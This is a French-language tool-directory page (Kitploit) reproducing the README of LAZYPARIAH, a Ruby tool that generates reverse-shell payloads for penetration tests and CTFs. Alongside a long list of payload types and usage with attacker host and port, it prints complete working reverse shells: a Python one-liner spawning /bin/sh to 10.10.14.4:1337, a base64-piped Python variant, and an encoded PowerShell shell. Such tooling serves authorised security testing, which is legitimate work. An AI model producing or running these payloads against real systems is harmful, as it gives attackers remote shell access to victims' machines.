Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
LAZYPARIAH — Un outil pour générer des payloads de shell inversé à la volée. | Kitploit
Outils/GitHubGitHub/octetsplicer/lazypariah
Génération de PayloadsExploitationCTFTests d'IntrusionCommandement et ContrôleRed TeamingGénération de ShellcodeDéveloppement de Charges UtilesArchived
GitHuboctetsplicer/lazypariah

LAZYPARIAH

Un outil pour générer des payloads de shell inversé à la volée.

124il y a 6 moisPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

LAZYPARIAH

Un outil en ligne de commande à faible dépendance pour générer des charges utiles de reverse shell à la volée.

Alt text

Description

LAZYPARIAH est un outil en ligne de commande simple et facile à installer écrit en Ruby pur qui peut être utilisé lors de tests de pénétration et de compétitions capture-the-flag (CTF) pour générer une gamme de charges utiles de reverse shell à la volée.

Les charges utiles de reverse shell que LAZYPARIAH prend en charge incluent (sans s'y limiter) :

  • Charges utiles binaires C (compilées à la volée) : c_binary
  • Charges utiles Ruby : ruby, ruby_b64, ruby_hex, ruby_c
  • Charges utiles PowerShell : powershell_c, powershell_b64
  • Charges utiles Python encodées en base64 : python_b64
  • Charges utiles binaires Rust (compilées à la volée) : rust_binary
  • Scripts PHP contenant des charges utiles Python encodées en base64 appelées via la fonction system() : php_system_python_b64
  • Classes Java (compilées à la volée) : java_class
  • Charges utiles Perl : perl, perl_b64, perl_hex, perl_c
  • Charges utiles PHP simples (ciblant des descripteurs de fichier spécifiques) : php_fd, php_fd_c, php_fd_tags

Avertissement

Cet outil est destiné à être utilisé uniquement dans des circonstances autorisées par des testeurs de pénétration qualifiés, des chercheurs en sécurité et des professionnels des équipes rouges. Avant de télécharger, installer ou utiliser cet outil, assurez-vous de comprendre les lois applicables dans votre juridiction. L'auteur de cet outil n'approuve, n'encourage ni ne tolère l'utilisation de cet outil à des fins illégales ou non autorisées.

Dépendances

  • Ruby >= 2.7.1 (LAZYPARIAH n'a pas été testé sur les versions précédentes de Ruby)
  • OpenJDK (Optionnel : requis uniquement pour les charges utiles java_class.)
  • GCC (Optionnel : requis uniquement pour les charges utiles c_binary.)
  • Rust (Optionnel : requis uniquement pour les charges utiles rust_binary.)

Installation

LAZYPARIAH peut être installé sur la plupart des systèmes GNU/Linux et BSD en utilisant l'installateur RubyGems comme suit :

gem install lazypariah

Utilisation

Usage:	lazypariah [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>
Note:	<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.

Example:	lazypariah -u python_b64 10.10.14.4 1555
Example:	lazypariah python_c malicious.local 1337

Valid Payloads:
    awk
    bash_tcp
    c_binary
    java_class
    nc
    nc_openbsd
    nc_pipe
    nodejs
    nodejs_b64
    nodejs_c
    nodejs_hex
    perl
    perl_b64
    perl_c
    perl_hex
    php_fd
    php_fd_c
    php_fd_tags
    php_system_python_b64
    php_system_python_hex
    php_system_python_ipv6_b64
    php_system_python_ipv6_hex
    powershell_b64
    powershell_c
    python
    python_b64
    python_c
    python_hex
    python_ipv6
    python_ipv6_b64
    python_ipv6_c
    python_ipv6_hex
    ruby
    ruby_b64
    ruby_c
    ruby_hex
    rust_binary
    socat

Valid Options:
    -h, --help                       Display help text and exit.
    -l, --license                    Display license information and exit.
    -u, --url                        URL-encode the payload.
    -v, --version                    Display version information and exit.
    -D, --fd INTEGER                 Specify the file descriptor used by the target for TCP. Required for certain payloads.
    -P, --pv INTEGER                 Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.
    -N, --no-new-line                Do not append a new-line character to the end of the payload.
        --b64                        Encode a c_binary, rust_binary or java_class payload in base-64.
        --hex                        Encode a c_binary, rust_binary or java_class payload in hexadecimal.
        --gzip                       Compress a c_binary, rust_binary or java_class payload using zlib.
        --gzip_b64                   Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in base-64.
        --gzip_hex                   Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in hexadecimal.

Remarques et exemples supplémentaires

Les charges utiles listées ci-dessus sont nommées plus ou moins systématiquement.

Les charges utiles se terminant par _c sont destinées à être exécutées depuis une session shell. Ces charges utiles exécutent du code directement en utilisant l'interpréteur correspondant (par exemple python3 -c ou ruby -e).

Par exemple, la commande lazypariah python_c 10.10.14.4 1337 devrait produire la sortie suivante :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

La commande lazypariah python 10.10.14.4 1337, quant à elle, devrait simplement produire un bloc de code Python qui pourrait potentiellement être placé dans un fichier .py :

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

De manière générale, sélectionner des charges utiles se terminant par _b64 devrait produire une commande destinée à être exécutée depuis une session shell d'une manière similaire aux charges utiles se terminant par _c, mais les commandes seront de structure différente. Ces commandes acheminent essentiellement un bloc de code encodé en base64 vers base64 -d puis vers l'interpréteur correspondant (comme python3, python2 ou ruby).

Par exemple, la commande lazypariah python_b64 10.10.14.4 1337 devrait produire la sortie suivante :

echo aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjQiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOw== | base64 -d | python

L'exception est powershell_b64, qui utilise le décodeur base64 intégré de PowerShell. Par exemple, la commande lazypariah powershell_b64 10.10.14.4 1337 devrait retourner ce qui suit :

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANAAnACwAMQAzADMANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
Télécharger l’outil